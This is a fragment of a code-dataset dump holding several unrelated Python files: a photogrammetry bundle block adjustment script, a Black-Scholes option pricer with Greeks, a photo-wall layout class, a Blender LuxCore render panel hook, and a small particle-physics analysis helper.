subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nimport math, csv, json, os\nimport numpy as np\nfrom math import cos, sin, tan, atan2\nfrom numpy import zeros, eye, matmul\nfrom numpy.linalg import inv\nimport sys\n\ndef main():\n\n\t\n\targv=sys.argv\n\tio_reader = csv.DictReader(open(argv[1]))\n\tfd_reader = csv.DictReader(open(argv[2]))\n\teo_reader = csv.DictReader(open(argv[3]))\n\tcp_reader = csv.DictReader(open(argv[4]))\n\tar=int(argv[8])\n\tuncertainty_reader = csv.DictReader(open(argv[9]))\n\t\n\twith open(argv[5],'w') as output_file:\n\t\tcsv_writer = csv.writer(output_file)\n\t\tcsv_writer.writerow([\"output\"])\n\t\n\tio_data = list(io_reader)[0]\n\tf = float(io_data['focal_mm'])\n\tx_0 = float(io_data['xp_mm'])\n\ty_0 = float(io_data['yp_mm'])\n\tf1x = float(io_data['f1x'])\n\tf1y = float(io_data['f1y'])\n\tf2x = float(io_data['f2x'])\n\tf2y = float(io_data['f2y'])\n\tf3x = float(io_data['f3x'])\n\tf3y = float(io_data['f3y'])\n\tf4x = float(io_data['f4x'])\n\tf4y = float(io_data['f4y'])\n\tf5x = float(io_data['f5x'])\n\tf5y = float(io_data['f5y'])\n\tf6x = float(io_data['f6x'])\n\tf6y = float(io_data['f6y'])\n\tf7x = float(io_data['f7x'])\n\tf7y = float(io_data['f7y'])\n\tf8x = float(io_data['f8x'])\n\tf8y = float(io_data['f8y'])\n\t\n\tfd_data = list(fd_reader)\n\tfd_dict={}\n\tfor fd in fd_data:\n\t\tfd_key = fd['image_id']\n\t\tfd.pop('image_id')\n\t\tfd_dict[fd_key] = fd\n\n\teo_data = list(eo_reader)\n\teo_dict = {}\n\tfor eo in eo_data:\n\t\teo_key = eo['image_id']\n\t\teo.pop('image_id')\n\t\teo_dict[eo_key] = eo\n\n\tcp_data = list(cp_reader)\n\tcp_dict = {}\n\tcp_list=[]\n\tfor cp in cp_data:\n\t\tcp_key = cp['point_id']\n\t\tif cp_key not in cp_list:\n\t\t\tcp_list.append(cp_key)\n\t\t\tcp_dict[cp_key] = {'X':cp['X'],'Y':cp['Y'],'Z':cp['Z']}\n\n\tcontrol = list(filter(lambda x: x['groupid']==argv[6], cp_data))\n\tcheck = list(filter(lambda x: x['groupid']==argv[7], cp_data))\n\t\n\tuncertainty_data = list(uncertainty_reader)\n\t\n\tfor uncertainty in uncertainty_data:\n\t\tsig_x = float(uncertainty['X'])\n\t\tsig_y = float(uncertainty['Y'])\n\t\tsig_z = float(uncertainty['Z'])\n\t\t\n\tsix_par={}\n\timg_data=[*eo_dict]\n\tno_img=len(img_data)\n\n\tfor i in range(no_img):\n\t\t\n\t\tfm=np.array([[float(fd_dict[img_data[i]]['x1'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y1'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x2'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y2'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x3'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y3'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x4'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y4'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x5'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y5'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x6'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y6'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x7'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y7'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x8'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y8'])]])\n\t\t\n\t\tx1=fm[0,0]\n\t\ty1=fm[1,0]\n\t\tx2=fm[2,0]\n\t\ty2=fm[3,0]\n\t\tx3=fm[4,0]\n\t\ty3=fm[5,0]\n\t\tx4=fm[6,0]\n\t\ty4=fm[7,0]\n\t\tx5=fm[8,0]\n\t\ty5=fm[9,0]\n\t\tx6=fm[10,0]\n\t\ty6=fm[11,0]\n\t\tx7=fm[12,0]\n\t\ty7=fm[13,0]\n\t\tx8=fm[14,0]\n\t\ty8=fm[15,0]\n\t\t\n\t\txyc=np.array([[f1x],[f1y],[f2x],[f2y],[f3x],[f3y]])\n\t\tfpm=np.array([[x1,y1,1,0,0,0],[0,0,0,x1,y1,1],[x2,y2,1,0,0,0],[0,0,0,x2,y2,1],[x3,y3,1,0,0,0],[0,0,0,x3,y3,1]])\n\t\tdelta=matmul(inv(fpm),xyc)\t\n\t\tfc=np.array([[f1x],[f1y],[f2x],[f2y],[f3x],[f3y],[f4x],[f4y],[f5x],[f5y],[f6x],[f6y],[f7x],[f7y],[f8x],[f8y]])\n\t\tL0=fm\n\t\tL=L0\n\t\tWW=eye(16)\n\t\tlast_phi = 10\n\t\tkeep_going = 1\n\t\titer = 0\n\t\twhile keep_going == 1:\n\t\t\tAA=zeros([16,16])\n\t\t\tBB=zeros([16,6])\n\t\t\tFF=zeros([16,1])\n\t\t\ta1=delta[0,0]\n\t\t\ta2=delta[1,0]\n\t\t\ta3=delta[2,0]\n\t\t\ta4=delta[3,0]\n\t\t\ta5=delta[4,0]\n\t\t\ta6=delta[5,0]\n\t\t\tfor j in range(8):\n\t\t\t\trx=L[2*j,0]\n\t\t\t\try=L[2*j+1,0]\n\t\t\t\tx=fc[2*j,0]\n\t\t\t\ty=fc[2*j+1,0]\n\t\t\t\tF_s = np.array([[x-a1*rx-a2*ry-a3],[y-a4*rx-a5*ry-a6]])\n\t\t\t\tA_s = np.array([[-a1, -a2],[-a4, -a5]])\n\t\t\t\tB_s = np.array([[-rx, -ry, -1, 0, 0, 0],[0, 0, 0, -rx, -ry, -1]])\n\t\t\t\tFF[2*j:2*j+2,:] = F_s\n\t\t\t\tAA[2*j:2*j+2,2*j:2*j+2] = A_s\n\t\t\t\tBB[2*j:2*j+2,:] = B_s\n\t\t\t\t\n\t\t\tQ=inv(WW)\n\t\t\tff=-FF-matmul(AA,(L0-L))\n\t\t\tQe=matmul(matmul(AA,Q),AA.T)\n\t\t\tWe=inv(Qe)\n\n\t\t\tN=matmul(matmul(BB.T,We),BB)\n\t\t\tt=matmul(matmul(BB.T,We),ff)\n\t\t\tddel=matmul(inv(N),t)\n\t\t\tv=matmul(matmul(matmul(Q,AA.T),We),(ff-matmul(BB,ddel)))\n\t\t\tphi=matmul(matmul(v.T,WW),v)\n\t\t\tobj=abs((last_phi-phi[0,0])/last_phi)\n\t\t\tprint(\"iter nubmer: \"+str(iter))\n\t\t\tprint(\"objective function is : \"+str(obj))\n\t\t\t#Convergence check\n\t\t\tif obj<0.0001:\n\t\t\t\tkeep_going=0\n\t\t\t\tprint(\"Converged\")\n\t\t\t\tsix_par[img_data[i]]=delta\n\t\t\t\t\t\n\t\t\tL=L0+v\n\t\t\tdelta=delta+ddel\n\n\t\t\t\n\t\t\tif iter>100:\n\t\t\t\tkeep_going=0\n\t\t\t\tprint(\"too many iteration\")\n\n\t\t\tlast_phi = phi[0,0]\n\t\t\titer=iter+1\n\n\tno_obs = len(control)\n\tL0 = zeros((no_obs*2,1))\n\timage_list = []\t\t\n\tcontrol_list = []\n\tWW = zeros((2*no_obs,2*no_obs))\n\tfor i in range(no_obs):\n\t\tif control[i]['img_id'] not in image_list:\n\t\t\timage_list.append(control[i]['img_id'])\n\t\tif control[i]['point_id'] not in control_list:\n\t\t\tcontrol_list.append(control[i]['point_id'])\n\t\t\n\t\txx1 = float(control[i]['sample'])\n\t\tyy1 = float(control[i]['line'])\n\t\ta1 = six_par[control[i]['img_id']][0]\n\t\ta2 = six_par[control[i]['img_id']][1]\n\t\ta3 = six_par[control[i]['img_id']][2]\n\t\ta4 = six_par[control[i]['img_id']][3]\n\t\ta5 = six_par[control[i]['img_id']][4]\n\t\ta6 = six_par[control[i]['img_id']][5]\n\t\t\n\t\txx = a1*xx1+a2*yy1+a3-x_0\n\t\tyy = a4*xx1+a5*yy1+a6-y_0\n\t\trr = np.sqrt(xx**2+yy**2)\n\t\t\n\t\tif ar==1:\n\t\n\t\t\tH = float(eo_dict[control[i]['img_id']]['ZL'])\n\t\t\tHH = 0.0003048*H\n\t\t\thh = 0.0003048*float(control[i]['Z'])\n\t\t\tK= (2410*HH/(HH**2-6*HH+250)-2410*hh/(hh**2-6*hh+250)*(hh/HH))/1000000\n\t\t\tdr=-K*(rr+rr**3/f**2)\n\t\t\txx=xx+xx/rr*dr\n\t\t\tyy=yy+yy/rr*dr\n\t\t\t\n\t\t\t\n\t\tL0[2*i,0] = xx\n\t\tL0[2*i+1,0] = yy\n\t\t\n\t\tWW[2*i,2*i] = 1\n\t\tWW[2*i+1,2*i+1] = 1\n\t\t\n\tWxx = zeros((6*len(image_list)+3*len(control_list),6*len(image_list)+3*len(control_list))) \n\tWxyz = zeros((3*len(control_list),3*len(control_list)))\n\tdelta = zeros((6*len(image_list)+3*len(control_list),1))\n\t\n\tfor i in range(len(image_list)):\n\t\tWxx[6*i,6*i]=(1/(3.28084*100))**2\n\t\tWxx[6*i+1,6*i+1]=(1/(3.28084*100))**2\n\t\tWxx[6*i+2,6*i+2]=(1/(3.28084*100))**2\n\t\tWxx[6*i+3,6*i+3]=(1/(10/(180*np.pi)))**2\n\t\tWxx[6*i+4,6*i+4]=(1/(10/(180*np.pi)))**2\n\t\tWxx[6*i+5,6*i+5]=(1/(10/(180*np.pi)))**2\n\t \n\tfor i in range(len(control_list)):\n\t\tWxyz[3*i,3*i]=(1/sig_x)**2\n\t\tWxyz[3*i+1,3*i+1]=(1/sig_y)**2\n\t\tWxyz[3*i+2,3*i+2]=(1/sig_z)**2\n\n\tWxx[6*len(image_list):6*len(image_list)+3*len(control_list),6*len(image_list):6*len(image_list)+3*len(control_list)] = Wxyz\n\t\n\tfor i in range(len(image_list)):\n\t\tdelta[6*i,0]=float(eo_dict[image_list[i]]['XL'])\n\t\tdelta[6*i+1,0]=float(eo_dict[image_list[i]]['YL'])\n\t\tdelta[6*i+2,0]=float(eo_dict[image_list[i]]['ZL'])\n\t\tdelta[6*i+3,0]=float(eo_dict[image_list[i]]['omega'])\n\t\tdelta[6*i+4,0]=float(eo_dict[image_list[i]]['phi'])\n\t\tdelta[6*i+5,0]=float(eo_dict[image_list[i]]['kappa'])\n\n\tfor i in range(len(control_list)):\n\t\tdelta[6*len(image_list)+3*i,0]=float(cp_dict[control_list[i]]['X'])\n\t\tdelta[6*len(image_list)+3*i+1,0]=float(cp_dict[control_list[i]]['Y'])\n\t\tdelta[6*len(image_list)+3*i+2,0]=float(cp_dict[control_list[i]]['Z'])\n\t\t\n\tlast_phi = 10\n\tkeep_going = 1\n\titer = 0\n\tL=L0\n\tdelta_0=delta\n\twhile keep_going == 1:\n\t\tFF=zeros((no_obs*2,1))\n\t\tAA=zeros((no_obs*2,no_obs*2))\n\t\tBB=zeros((no_obs*2,6*len(image_list)+3*len(control_list)))\n\t\tfor i in range(no_obs):\n\t\t\timg_ind=image_list.index(control[i]['img_id'])\n\t\t\tpt_ind=control_list.index(control[i]['point_id'])\n\t\t\tx = L[2*i,0] \n\t\t\ty = L[2*i+1,0]\n\t\t\tXL = delta[6*img_ind,0]\n\t\t\tYL = delta[6*img_ind+1,0]\n\t\t\tZL = delta[6*img_ind+2,0]\n\t\t\to = delta[6*img_ind+3,0]\n\t\t\tp = delta[6*img_ind+4,0]\n\t\t\tk = delta[6*img_ind+5,0]\n\t\t\tX=delta[6*len(image_list)+3*pt_ind,0]\n\t\t\tY=delta[6*len(image_list)+3*pt_ind+1,0]\t\t\t\n\t\t\tZ=delta[6*len(image_list)+3*pt_ind+2,0]\n\t\t\tM = np.array([[cos(p)*cos(k), cos(o)*sin(k)+sin(o)*sin(p)*cos(k), sin(o)*sin(k)-cos(o)*sin(p)*cos(k)],\n\t\t\t\t\t\t[-cos(p)*sin(k), cos(o)*cos(k)-sin(o)*sin(p)*sin(k), sin(o)*cos(k)+cos(o)*sin(p)*sin(k)],\n\t\t\t\t\t\t[sin(p), -sin(o)*cos(p), cos(o)*cos(p)]])\n\n\t\t\t\n\t\t\tU = M[0,0]*(X-XL)+M[0,1]*(Y-YL)+M[0,2]*(Z-ZL)\n\t\t\tV = M[1,0]*(X-XL)+M[1,1]*(Y-YL)+M[1,2]*(Z-ZL)\n\t\t\tW = M[2,0]*(X-XL)+M[2,1]*(Y-YL)+M[2,2]*(Z-ZL)\n\t\t\t\n\n\t\t\tF_s = np.array([[x+f*U/W],[y+f*V/W]])\n\t\t\t\t\n\t\t\tUo = M[0,1]*(Z-ZL)-M[0,2]*(Y-YL)\t\n\t\t\tUp = -W*cos(k)\n\t\t\tUk = V\n\t\t\t\n\t\t\tVo = M[1,1]*(Z-ZL)-M[1,2]*(Y-YL)\n\t\t\tVp = W*sin(k)\n\t\t\tVk = -U\n\t\t\t\n\t\t\tWo = M[2,1]*(Z-ZL)-M[2,2]*(Y-YL)\n\t\t\tWp = U*cos(k)-V*sin(k)\n\t\t\tWk = 0\n\t\t\t\n\t\t\tB11 = f*(-M[0,0]+U/W*M[2,0])/W\n\t\t\tB12 = f*(-M[0,1]+U/W*M[2,1])/W\n\t\t\tB13 = f*(-M[0,2]+U/W*M[2,2])/W\n\t\t\tB14 = f*(Uo-U/W*Wo)/W\n\t\t\tB15 = f*(Up-U/W*Wp)/W\n\t\t\tB16 = f*(Uk-U/W*Wk)/W\n\t\t\t\n\t\t\tB17 = -B11\n\t\t\tB18 = -B12\n\t\t\tB19 = -B13\n\t\t\t\n\t\t\tB21 = f*(-M[1,0]+V/W*M[2,0])/W\n\t\t\tB22 = f*(-M[1,1]+V/W*M[2,1])/W\n\t\t\tB23 = f*(-M[1,2]+V/W*M[2,2])/W\n\t\t\tB24 = f*(Vo-V/W*Wo)/W\n\t\t\tB25 = f*(Vp-V/W*Wp)/W\n\t\t\tB26 = f*(Vk-V/W*Wk)/W\t\t\t\t\n\t\t\t\n\t\t\tB27 = -B21\n\t\t\tB28 = -B22\n\t\t\tB29 = -B23\n\t\t\t\n\t\t\tA_s = np.array([[1,0],[0,1]])\n\t\t\t\n\t\t\tFF[2*i:2*i+2,:] = F_s\n\t\t\tAA[2*i:2*i+2,2*i:2*i+2] = A_s\n\t\t\tBB[2*i:2*i+2,6*img_ind:6*img_ind+6] = np.array([[B11, B12, B13, B14, B15, B16],[B21, B22, B23, B24, B25, B26]])\n\t\t\tBB[2*i:2*i+2,6*len(image_list)+3*pt_ind:6*len(image_list)+3*pt_ind+3] = np.array([[B17, B18, B19],[B27, B28, B29]])\n\n\n\t\tQ=inv(WW)\n\t\tff=-FF-matmul(AA,(L0-L))\n\t\tQe=matmul(matmul(AA,Q),AA.T)\n\t\tWe=inv(Qe)\n\t\t\n\t\tN=matmul(matmul(BB.T,We),BB)\n\t\tt=matmul(matmul(BB.T,We),ff)\n\t\tfx=delta-delta_0\n\t\tddel=matmul(inv(N+Wxx),(t-matmul(Wxx,fx)))\n\t\t\n\t\tv=matmul(matmul(matmul(Q,AA.T),We),(ff-matmul(BB,ddel)))\n\t\t\n\t\tvvx=fx+ddel\n\t\tphi=matmul(matmul(v.T,WW),v)+matmul(matmul(vvx.T,Wxx),vvx)\n\t\tobj=abs((last_phi-phi[0,0])/last_phi)\n\t\tprint(\"iter nubmer: \"+str(iter))\n\t\tprint(\"objective function is : \"+str(obj))\n\t\t#Convergence check\n\t\tif obj<0.0001:\n\t\t\tkeep_going=0\n\t\t\tprint(\"Converged\")\n\t\t\t\n\t\t\trmse_vx=np.sqrt(np.sum(v[0::2]**2)/len(v[0::2]))\n\t\t\trmse_vy=np.sqrt(np.sum(v[1::2]**2)/len(v[1::2]))\n\t\t\t\n\t\t\tprint(rmse_vx)\n\t\t\tprint(rmse_vy)\t\t\n\t\t\t\n\t\t\twith open(argv[5],'a') as output_file:\n\t\t\t\tcsv_writer = csv.writer(output_file)\n\t\t\t\tcsv_writer.writerow([\"residuals\"])\n\t\t\t\tcsv_writer = csv.writer(output_file)\n\t\t\t\tcsv_writer.writerow([\"rmse x\"])\n\t\t\t\tcsv_writer.writerow([np.sqrt(sum(v[0::2]**2)/len(v[0::2]))])\n\t\t\t\tcsv_writer.writerow([\"rmse y\"])\n\t\t\t\tcsv_writer.writerow([np.sqrt(sum(v[1::2]**2)/len(v[1::2]))])\n\t\t\t\t\t\t\n\t\t\tfor i in range(no_obs):\n\t\t\t\timg_ind=image_list.index(control[i]['img_id'])\n\t\t\t\tpt_ind=control_list.index(control[i]['point_id'])\n\t\t\t\tx = L[2*i,0] \n\t\t\t\ty = L[2*i+1,0]\n\t\t\t\tXL = delta[6*img_ind,0]\n\t\t\t\tYL = delta[6*img_ind+1,0]\n\t\t\t\tZL = delta[6*img_ind+2,0]\n\t\t\t\to = delta[6*img_ind+3,0]\n\t\t\t\tp = delta[6*img_ind+4,0]\n\t\t\t\tk = delta[6*img_ind+5,0]\n\t\t\t\tX=delta[6*len(image_list)+3*pt_ind,0]\n\t\t\t\tY=delta[6*len(image_list)+3*pt_ind+1,0]\t\t\t\n\t\t\t\tZ=delta[6*len(image_list)+3*pt_ind+2,0]\n\n\t\tif keep_going==1:\t\n\t\t\tL=L0+v\n\t\t\tdelta=delta+ddel\n\n\t\tif iter>100:\n\t\t\tkeep_going=0\n\t\t\tprint(\"too many iteration\")\n\n\t\tlast_phi = phi[0,0]\n\t\titer=iter+1\n\t\tresult={}\n\twith open(argv[5],'a') as output_file:\n\t\tcsv_writer = csv.writer(output_file)\n\t\tcsv_writer.writerow([\"Exterior Orientation Parameters\"])\n\t\tresult_eo={}\n\t\tfor i in range(len(image_list)):\n\t\t\teo_i={}\n\t\t\teo_i['XL']=delta[6*i,0]\n\t\t\teo_i['YL']=delta[6*i+1,0]\n\t\t\teo_i['ZL']=delta[6*i+2,0]\n\t\t\teo_i['omega']=delta[6*i+3,0]\n\t\t\teo_i['phi']=delta[6*i+4,0]\n\t\t\teo_i['kappa']=delta[6*i+5,0]\n\t\t\tresult_eo[image_list[i]]=eo_i\n\t\t\t\n\t\t\tcsv_writer.writerow([image_list[i]])\n\t\t\tcsv_writer.writerow(['XL(ft): '+str(delta[6*i,0])])\n\t\t\tcsv_writer.writerow(['YL(ft): '+str(delta[6*i+1,0])])\n\t\t\tcsv_writer.writerow(['ZL(ft): '+str(delta[6*i+2,0])])\n\t\t\tcsv_writer.writerow(['omeag(rad): '+str(delta[6*i+3,0])])\n\t\t\tcsv_writer.writerow(['phi(rad): '+str(delta[6*i+4,0])])\n\t\t\tcsv_writer.writerow(['kappa(rad): '+str(delta[6*i+5,0])])\n\t\t\tcsv_writer.writerow(\" \")\n\t\t\n\t\tcsv_writer.writerow([\"scale factor\"])\n\t\tscale={}\n\t\tfor i in range(no_obs):\n\t\t\timg_ind=image_list.index(control[i]['img_id'])\n\t\t\tpt_ind=control_list.index(control[i]['point_id'])\n\t\t\tif control[i]['img_id'] not in scale.keys():\n\t\t\t\tscale[control[i]['img_id']]=[]\n\t\t\t\n\t\t\tx = L[2*i,0] \n\t\t\ty = L[2*i+1,0]\n\t\t\tXL = delta[6*img_ind,0]\n\t\t\tYL = delta[6*img_ind+1,0]\n\t\t\tZL = delta[6*img_ind+2,0]\n\t\t\to = delta[6*img_ind+3,0]\n\t\t\tp = delta[6*img_ind+4,0]\n\t\t\tk = delta[6*img_ind+5,0]\n\t\t\tX=delta[6*len(image_list)+3*pt_ind,0]\n\t\t\tY=delta[6*len(image_list)+3*pt_ind+1,0]\t\t\t\n\t\t\tZ=delta[6*len(image_list)+3*pt_ind+2,0]\n\t\t\tM = np.array([[cos(p)*cos(k), cos(o)*sin(k)+sin(o)*sin(p)*cos(k), sin(o)*sin(k)-cos(o)*sin(p)*cos(k)],\n\t\t\t\t\t[-cos(p)*sin(k), cos(o)*cos(k)-sin(o)*sin(p)*sin(k), sin(o)*cos(k)+cos(o)*sin(p)*sin(k)],\n\t\t\t\t\t[sin(p), -sin(o)*cos(p), cos(o)*cos(p)]])\n\t\t\tk = matmul(inv(M),np.array([[x],[y],[-f]]))/np.array([[X-XL],[Y-YL],[Z-ZL]])\n\t\t\tcsv_writer.writerow(['k: '+str(k.T)+\" for image:\"+str(image_list[img_ind])+\" for point:\"+str(pt_ind)])\n\t\t\tscale_pt={}\n\t\t\tscale_pt[control[i]['point_id']]=np.mean(k)\n\t\t\tscale[control[i]['img_id']].append(scale_pt)\n\t\t\t\n\t\tcsv_writer.writerow([\"Control Points, Pass Points Coordinates\"])\n\t\tresult_cp={}\n\t\tfor i in range(len(control_list)):\n\t\t\tcp_i={}\n\t\t\tcp_i['X']=delta[6*len(image_list)+3*i,0]\n\t\t\tcp_i['Y']=delta[6*len(image_list)+3*i,0]\n\t\t\tcp_i['Z']=delta[6*len(image_list)+3*i,0]\n\t\t\tresult_cp[control_list[i]]=eo_i\t\t\n\t\t\tcsv_writer.writerow([control_list[i]])\n\t\t\tcsv_writer.writerow(['X(ft): '+str(delta[6*len(image_list)+3*i,0])])\n\t\t\tcsv_writer.writerow(['Y(ft): '+str(delta[6*len(image_list)+3*i+1,0])])\n\t\t\tcsv_writer.writerow(['Z(ft): '+str(delta[6*len(image_list)+3*i+2,0])])\n\t\t\tcsv_writer.writerow(\" \")\n\t\tresult['eo'] = result_eo\n\t\tresult['cp'] = result_cp\n\t\tresult['scale'] = scale\n\t\toutput_json = json.dumps(result, indent = 4)\n\n\t\tjson_fname = \".\".join([os.path.splitext(argv[5])[0],\"json\"])\n\t\twith open(json_fname,'w') as output_file:\n\t\t\toutput_file.write(output_json)\n\n\n\nif __name__==\"__main__\":\n\tmain()\n","sub_path":"bba_nr.py","file_name":"bba_nr.py","file_ext":"py","file_size_in_byte":15116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"259915","text":"#\r\n# PRO: BS.py\r\n#\r\n# PURPOSE: Use Black-Scholes European price equation to price call and put option based upon required inputs (S, K, sigma, delta, r, time to maturity (years))\r\n#\r\n# DATE: 2/12/2022\r\n#\r\n# AUTHOR: R.H.\r\n#\r\n\r\nimport pandas as pd\r\n\r\nimport math\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nimport os \r\n\r\n# Where am I?\r\nprint(os.getcwd())\r\n\r\n\r\ndef BS(S, K, sigma, delta, r, time):\r\n d1 = ((np.log(S/K)) + (((r-delta)+.5*sigma*sigma)*time))\r\n d1= d1/(sigma*math.sqrt(time))\r\n nd1 = norm.cdf(d1,loc=0, scale=1)\r\n\r\n d2 = d1 -sigma*math.sqrt(time)\r\n nd2 = norm.cdf(d2,loc=0, scale=1)\r\n\r\n\r\n BS_CALL = S*np.exp(-delta*time)*nd1 - K*np.exp(-r*time)*nd2 \r\n BS_PUT = BS_CALL + K*np.exp(-r*time) - S*np.exp(-delta*time)\r\n\r\n BS_CALL = round(BS_CALL, ndigits = 4)\r\n BS_PUT = round(BS_PUT, ndigits = 4)\r\n\r\n ####### GREEKS START HERE ##########\r\n DELTA_CALL = np.exp(-delta*(time))*norm.cdf(d1,loc=0, scale=1)\r\n DELTA_PUT = -np.exp(-delta*time)*norm.cdf(-d1, loc=0, scale=1) \r\n \r\n GAMMA_CALL = (np.exp(-delta*time)* norm.pdf(d1, loc = 0, scale = 1))/(S*sigma*np.sqrt(time))\r\n GAMMA_PUT = GAMMA_CALL \r\n \r\n THETA_CALL = delta*S*np.exp(-delta*(time))*norm.cdf(d1,loc = 0, scale = 1) - r*K*np.exp(-r*(time))*norm.cdf(d2,loc = 0,scale=1) - ((K*np.exp(-r*(time))*norm.pdf(d2,loc = 0,scale=1)*sigma)/(2*np.sqrt(time))) \r\n THETA_PUT = THETA_CALL + r*K*np.exp(-r*(time)) - delta * S*np.exp(-delta*(time))\r\n \r\n VEGA_CALL = S*np.exp(-delta*time)*norm.pdf(d1,loc = 0,scale =1)*np.sqrt(time)\r\n VEGA_PUT = VEGA_CALL\r\n \r\n RHO_CALL = time*K*np.exp(-r*time)*norm.cdf(d2,loc = 0,scale =1)\r\n RHO_PUT = -time*K*np.exp(-r*time)*norm.cdf(-d2, loc = 0, scale=1)\r\n \r\n PSI_CALL = -time*S*np.exp(-delta*time)*norm.cdf(d1, loc = 0, scale =1)\r\n PSI_PUT = time*S*np.exp(-delta*time)*norm.cdf(-d1,loc = 0, scale=1)\r\n ########## GREEKS END HERE ##########\r\n\r\n d = {'CALL':[BS_CALL, DELTA_CALL, GAMMA_CALL, THETA_CALL, VEGA_CALL, RHO_CALL, PSI_CALL], \r\n 'PUT' :[BS_PUT, DELTA_PUT, GAMMA_PUT, THETA_PUT, VEGA_PUT, RHO_PUT, PSI_PUT]}\r\n df = pd.DataFrame(data=d, index=['Price', 'Delta', 'Gamma', 'Theta', 'Vega', 'Rho', 'Psi'])\r\n\r\n return(df)\r\n\r\ndef BS_PRICE(S, K, sigma, delta, r, time):\r\n d1 = ((np.log(S/K)) + (((r-delta)+.5*sigma*sigma)*time))\r\n d1= d1/(sigma*math.sqrt(time))\r\n nd1 = norm.cdf(d1,loc=0, scale=1)\r\n\r\n d2 = d1 -sigma*math.sqrt(time)\r\n nd2 = norm.cdf(d2,loc=0, scale=1)\r\n\r\n\r\n BS_CALL = S*np.exp(-delta*time)*nd1 - K*np.exp(-r*time)*nd2 \r\n BS_PUT = BS_CALL + K*np.exp(-r*time) - S*np.exp(-delta*time)\r\n return(BS_CALL, BS_PUT)\r\n\r\n\r\n\r\n\r\n","sub_path":"BS.py","file_name":"BS.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528412634","text":"import os\n\nbasedir = os.path.join(os.getcwd(), \"static\")\n\nclass Wall(object):\n def __init__(self, dict):\n self.dict = dict\n self.half_col = 0\n self.half_row = 0\n self.z = 0\n self.positons = []\n self.folder = os.path.join(basedir, dict)\n\n def create(self):\n wall = {0: (2, 5, 5000), 10: (2, 5, 5000), 20: (4, 5, 5000), 30: (5, 6, 5000), 40: (5, 8, 6000),\n 50: (5, 10, 6000),60: (6, 10, 6000), 70: (7, 10, 7000), 80: (8, 10, 7000),\n 90: (9, 10, 8000), 100: (10, 10, 9000)}\n col = 0\n row = 0\n print(self.dict, self.folder)\n filelist = []\n for f in os.listdir(self.folder):\n filelist.append(f)\n\n count = len(filelist)\n for k in wall.keys():\n if count in range(k - 10, k + 1):\n col, row, self.z = wall[k-10]\n for x in range(400, 900 * row, 900):\n for y in range(300, 700 * col, 700):\n #convert to set\n #must be '/'\n self.positons.append((self.dict+\"/\"+filelist.pop(), x, y, self.z))\n\n self.half_col = col * 900 / 2\n self.half_row = row * 700 / 2\n print(self.positons)\n return self.positons\n\n def overview(self):\n x = self.half_row\n y = self.half_col\n z = self.z * 2\n return [x, y, z]\n","sub_path":"pretty-photo-wall/wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110805175","text":"from bl_ui.properties_render import RENDER_PT_render\nfrom . import icons\n\n# Note: The main LuxCore config UI is defined in ui/config.py\n# Each of the other render panels is also defined in their\n# own specific files in the ui/ folder.\n\n\ndef luxcore_render_draw(panel, context):\n layout = panel.layout\n scene = context.scene\n\n if scene.render.engine != \"LUXCORE\":\n return\n\n split = layout.split(percentage=0.66, align=True)\n row = split.row(align=True)\n row.operator(\"luxcore.start_pyluxcoretools\")\n row = split.row(align=True)\n op = row.operator(\"luxcore.open_website\", icon=icons.URL, text=\"Wiki\")\n op.url = \"https://wiki.luxcorerender.org/BlendLuxCore_Network_Rendering\"\n\n\ndef register():\n # We append our draw function to the existing Blender render panel\n RENDER_PT_render.append(luxcore_render_draw)\n\n\ndef unregister():\n RENDER_PT_render.remove(luxcore_render_draw)\n","sub_path":"All_In_One/addons/BlendLuxCore/ui/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"422365639","text":"from StopsDilepton.tools.helpers import getChain\n\nchannels = ['EE', 'MuMu', 'EMu']\nallChannels = ['all', 'EE', 'MuMu', 'EMu']\n\n#def loadChain(s, verbose=False):\n# '''Use this function to add the chain to the sample dictionary.\n#Will not load again if has already loaded'''\n# if not s.has_key('chain'):\n# if verbose:print \"Loading chain for sample %s. (Only the first time).\"%s['name']\n# s['chain']=getChain(s)\n\nfrom StopsDilepton.tools.helpers import mZ\ndef getZCut(mode, zMassRange=15):\n zstr = \"abs(dl_mass - \"+str(mZ)+\")\"\n if mode.lower()==\"onz\": return zstr+\"<=\"+str(zMassRange)\n if mode.lower()==\"offz\": return zstr+\">\"+str(zMassRange)\n return \"(1)\"\n\n","sub_path":"analysis/python/SetupHelpers.py","file_name":"SetupHelpers.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 